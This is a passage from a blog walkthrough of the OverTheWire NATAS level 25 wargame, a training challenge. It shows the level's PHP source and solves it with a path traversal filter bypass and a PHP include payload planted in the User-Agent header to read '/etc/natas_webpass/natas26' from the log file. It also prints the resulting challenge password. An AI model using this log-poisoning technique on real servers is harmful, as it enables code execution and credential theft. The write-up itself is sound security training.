      <span class="nf">logRequest</span><span class="p">(</span><span class="s2">"Directory traversal attempt! fixing request."</span><span class="p">);</span>
      <span class="nv">$filename</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"../"</span><span class="p">,</span><span class="s2">""</span><span class="p">,</span><span class="nv">$filename</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="c1">// dont let ppl steal our passwords</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">strstr</span><span class="p">(</span><span class="nv">$filename</span><span class="p">,</span><span class="s2">"natas_webpass"</span><span class="p">)){</span>
      <span class="nf">logRequest</span><span class="p">(</span><span class="s2">"Illegal file access detected! Aborting!"</span><span class="p">);</span>
      <span class="k">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="c1">// add more checks...</span>

    <span class="k">if</span> <span class="p">(</span><span class="nb">file_exists</span><span class="p">(</span><span class="nv">$filename</span><span class="p">))</span> <span class="p">{</span> 
      <span class="k">include</span><span class="p">(</span><span class="nv">$filename</span><span class="p">);</span>
      <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
  <span class="p">}</span>
  
  <span class="k">function</span> <span class="n">listFiles</span><span class="p">(</span><span class="nv">$path</span><span class="p">){</span>
    <span class="nv">$listoffiles</span><span class="o">=</span><span class="k">array</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="nv">$handle</span> <span class="o">=</span> <span class="nb">opendir</span><span class="p">(</span><span class="nv">$path</span><span class="p">))</span>
      <span class="k">while</span> <span class="p">(</span><span class="kc">false</span> <span class="o">!==</span> <span class="p">(</span><span class="nv">$file</span> <span class="o">=</span> <span class="nb">readdir</span><span class="p">(</span><span class="nv">$handle</span><span class="p">)))</span>
        <span class="k">if</span> <span class="p">(</span><span class="nv">$file</span> <span class="o">!=</span> <span class="s2">"."</span> <span class="o">&amp;&amp;</span> <span class="nv">$file</span> <span class="o">!=</span> <span class="s2">".."</span><span class="p">)</span>
          <span class="nv">$listoffiles</span><span class="p">[]</span><span class="o">=</span><span class="nv">$file</span><span class="p">;</span>
    
    <span class="nb">closedir</span><span class="p">(</span><span class="nv">$handle</span><span class="p">);</span>
    <span class="k">return</span> <span class="nv">$listoffiles</span><span class="p">;</span>
  <span class="p">}</span> 
  
  <span class="k">function</span> <span class="n">logRequest</span><span class="p">(</span><span class="nv">$message</span><span class="p">){</span>
    <span class="nv">$log</span><span class="o">=</span><span class="s2">"["</span><span class="mf">.</span> <span class="nb">date</span><span class="p">(</span><span class="s2">"d.m.Y H::i:s"</span><span class="p">,</span><span class="nb">time</span><span class="p">())</span> <span class="mf">.</span><span class="s2">"]"</span><span class="p">;</span>
    <span class="nv">$log</span><span class="o">=</span><span class="nv">$log</span> <span class="mf">.</span> <span class="s2">" "</span> <span class="mf">.</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'HTTP_USER_AGENT'</span><span class="p">];</span>
    <span class="nv">$log</span><span class="o">=</span><span class="nv">$log</span> <span class="mf">.</span> <span class="s2">" </span><span class="se">\"</span><span class="s2">"</span> <span class="mf">.</span> <span class="nv">$message</span> <span class="mf">.</span><span class="s2">"</span><span class="se">\"\n</span><span class="s2">"</span><span class="p">;</span> 
    <span class="nv">$fd</span><span class="o">=</span><span class="nb">fopen</span><span class="p">(</span><span class="s2">"/var/www/natas/natas25/logs/natas25_"</span> <span class="mf">.</span> <span class="nb">session_id</span><span class="p">()</span> <span class="mf">.</span><span class="s2">".log"</span><span class="p">,</span><span class="s2">"a"</span><span class="p">);</span>
    <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$fd</span><span class="p">,</span><span class="nv">$log</span><span class="p">);</span>
    <span class="nb">fclose</span><span class="p">(</span><span class="nv">$fd</span><span class="p">);</span>
  <span class="p">}</span>
<span class="cp">?&gt;</span>

<span class="nt">&lt;h1&gt;</span>natas25<span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"content"</span><span class="nt">&gt;</span>
<span class="nt">&lt;div</span> <span class="na">align=</span><span class="s">"right"</span><span class="nt">&gt;</span>
<span class="nt">&lt;form&gt;</span>
<span class="nt">&lt;select</span> <span class="na">name=</span><span class="s">'lang'</span> <span class="na">onchange=</span><span class="s">'this.form.submit()'</span><span class="nt">&gt;</span>
<span class="nt">&lt;option&gt;</span>language<span class="nt">&lt;/option&gt;</span>
<span class="cp">&lt;?php</span> <span class="k">foreach</span><span class="p">(</span><span class="nf">listFiles</span><span class="p">(</span><span class="s2">"language/"</span><span class="p">)</span> <span class="k">as</span> <span class="nv">$f</span><span class="p">)</span> <span class="k">echo</span> <span class="s2">"&lt;option&gt;</span><span class="nv">$f</span><span class="s2">&lt;/option&gt;"</span><span class="p">;</span> <span class="cp">?&gt;</span>
<span class="nt">&lt;/select&gt;</span>
<span class="nt">&lt;/form&gt;</span>
<span class="nt">&lt;/div&gt;</span>

<span class="cp">&lt;?php</span> 
  <span class="nb">session_start</span><span class="p">();</span>
  <span class="nf">setLanguage</span><span class="p">();</span>
  
  <span class="k">echo</span> <span class="s2">"&lt;h2&gt;</span><span class="nv">$__GREETING</span><span class="s2">&lt;/h2&gt;"</span><span class="p">;</span>
  <span class="k">echo</span> <span class="s2">"&lt;p align=</span><span class="se">\"</span><span class="s2">justify</span><span class="se">\"</span><span class="s2">&gt;</span><span class="nv">$__MSG</span><span class="s2">"</span><span class="p">;</span>
  <span class="k">echo</span> <span class="s2">"&lt;div align=</span><span class="se">\"</span><span class="s2">right</span><span class="se">\"</span><span class="s2">&gt;&lt;h6&gt;</span><span class="nv">$__FOOTER</span><span class="s2">&lt;/h6&gt;&lt;div&gt;"</span><span class="p">;</span>
<span class="cp">?&gt;</span>
<span class="nt">&lt;p&gt;</span></code></pre></figure><p>Looking at the source there are a couple of things that jump out at me. First is the homegrown checks on input for the language file. Those checks can probably be gotten around. Also there is a logfile getting written to that may be vulnerable to a stored XSS type of attack.</p><h4 id="objective-1"><span class="mr-2">Objective 1</span><a href="#objective-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><p>Try to get around the checks on the included language file.</p><p>I started out with getting one of the checks to fail, to see what would happen and to create the log file, using <code class="language-plaintext highlighter-rouge">/?lang=/../logs/natas25_g2ouhkp80fj036rpalvnpb9l13.log</code> There was no obvious result on the response page, but maybe the log file was created.</p><p>Next I tried <code class="language-plaintext highlighter-rouge">/?lang=/…/./logs/natas25_g2ouhkp80fj036rpalvnpb9l13.log</code>. Important point being the “../” was removed from “/…/./”, leaving “/../” correctly in place.<br /> I get the expected log output as:</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">[19.09.2019 12::52:19] Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 "Directory traversal attempt! fixing request."
[19.09.2019 12::54:32] Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 "Directory traversal attempt! fixing request."</code></pre></figure><p><img class="alignnone size-full wp-image-288" data-src="/assets/img/2019/09/2019-09-19_12h58_22.png" data-proofer-ignore></p><h4 id="objective-2"><span class="mr-2">Objective 2</span><a href="#objective-2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><p>Get around the check for “natas_webpass”.</p><p>Stored XSS is likely possible on the log file using the User-Agent string, since that gets saved. Injecting some PHP that reads “natas_webpass” should bypass the check on our variable.</p><p>Write “User-Agent: &lt;?php include(“/etc/natas_webpass/natas26″); ?&gt;” into the HTTP header using Burp Repeater:</p><figure class="highlight"><pre><code class="language-plain_text" data-lang="plain_text">[19.09.2019 12::52:19] Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 "Directory traversal attempt! fixing request."
[19.09.2019 12::54:32] Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 "Directory traversal attempt! fixing request."
[19.09.2019 12::56:21] Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 "Directory traversal attempt! fixing request."
[19.09.2019 13::05:45] oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
33 "Directory traversal attempt! fixing request."</code></pre></figure><p>Success!!</p><p> </p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/walkthrough/'>Walkthrough</a>, <a href='/categories/overthewire/'>OverTheWire</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/web/" class="post-tag no-text-decoration" >web</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=OverTheWire: NATAS 21 &amp;#8211; 25 - MegaWattSec&amp;url=https://megawattsec.com/posts/overthewire-natas-21/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=OverTheWire: NATAS 21 &amp;#8211; 25 - MegaWattSec&amp;u=https://megawattsec.com/posts/overthewire-natas-21/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://megawattsec.com/posts/overthewire-natas-21/&amp;text=OverTheWire: NATAS 21 &amp;#8211; 25 - MegaWattSec" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/hackthebox-haystack/">HackTheBox: Haystack</a><li><a href="/posts/hackthebox-craft/">HackTheBox: Craft</a><li><a href="/posts/hackthebox-bastion/">HackTheBox: Bastion</a><li><a href="/posts/hackthebox-jarvis/">HackTheBox: Jarvis</a><li><a href="/posts/hackthebox-swagshop/">HackTheBox: SwagShop</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/mysql/">mysql</a> <a class="post-tag" href="/tags/perl/">perl</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/anti-csrf/">anti-csrf</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/cve-2019-9185/">CVE-2019-9185</a> <a class="post-tag" href="/tags/docker/">docker</a> <a class="post-tag" href="/tags/elasticsearch/">elasticsearch</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/overthewire-natas-16/"><div class="card-body"> <em class="timeago small" data-ts="1568402533" > 2019-09-13 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>OverTheWire: NATAS 16 &#8211; 20</h3><div class="text-muted small"><p> LEVEL 16 This level looks a lot like level 9 did with the dictionary lookup and it suggests there are now more input checks. Let’s see the source: &amp;lt;form&amp;gt; Find words containing: &amp;lt;input ...</p></div></div></a></div><div class="card"> <a href="/posts/overthewire-natas-26/"><div class="card-body"> <em class="timeago small" data-ts="1568918412" > 2019-09-19 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>OverTheWire: NATAS 26 &#8211; 27</h3><div class="text-muted small"><p> LEVEL 26 The sourcecode: {% highlight php %} &amp;lt;?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $logFile; private $initMsg; private ...</p></div></div></a></div><div class="card"> <a href="/posts/overthewire-natas-28/"><div class="card-body"> <em class="timeago small" data-ts="1569506683" > 2019-09-26 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>OverTheWire: NATAS 28</h3><div class="text-muted small"><p> LEVEL 28 No sourcecode, this will be fun. The program takes your query and searches it against a list of jokes, possibly in a database (since it says “whack computer joke database”). Checking o...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/overthewire-natas-16/" class="btn btn-outline-primary" prompt="Older"><p>OverTheWire: NATAS 16 &#8211; 20</p></a> <a href="/posts/overthewire-natas-26/" class="btn btn-outline-primary" prompt="Newer"><p>OverTheWire: NATAS 26 &#8211; 27</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/megawattsec">Dustin</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/mysql/">mysql</a> <a class="post-tag" href="/tags/perl/">perl</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/anti-csrf/">anti-csrf</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/cve-2019-9185/">CVE-2019-9185</a> <a class="post-tag" href="/tags/docker/">docker</a> <a class="post-tag" href="/tags/elasticsearch/">elasticsearch</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
